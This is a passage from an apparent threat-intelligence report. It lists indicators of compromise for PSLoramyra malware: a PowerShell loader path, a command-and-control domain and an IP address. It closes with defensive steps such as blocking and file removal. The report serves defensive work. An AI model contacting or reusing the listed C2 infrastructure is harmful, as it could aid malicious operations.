| `C:\Users\Public\roox.ps1` | PowerShell script deobfuscating and loading payload. |
### **5.3. Domains**
| **Domain** | **Description** |
|-------------------------------|---------------------------------------------------------|
| `Ronymahmoud.casacam.net` | C2 server domain used by PSLoramyra. |
### **5.4. IP Addresses**
| **IP Address** | **Description** |
|----------------------|-------------------------------------------|
| `3.145.156.44` | IP address associated with PSLoramyra C2 server. |
### **Recommended Actions:**
- **Block Identified IPs and Domains:** Implement firewall rules to block communications with the listed IP addresses and domains.
- **Quarantine and Remove Malicious Files:** Search for and remove the specified files (`roox.vbs`, `roox.bat`, `roox.ps1`) from affected systems.
- **Monitor Network Traffic:** Continuously monitor network traffic for attempts to communicate with the identified IOCs.
- **Update Security Tools:** Ensure that all security solutions are updated with the latest threat intelligence to recognize and mitigate activities related to RevC2, More_eggs Lite, and PSLoramyra.
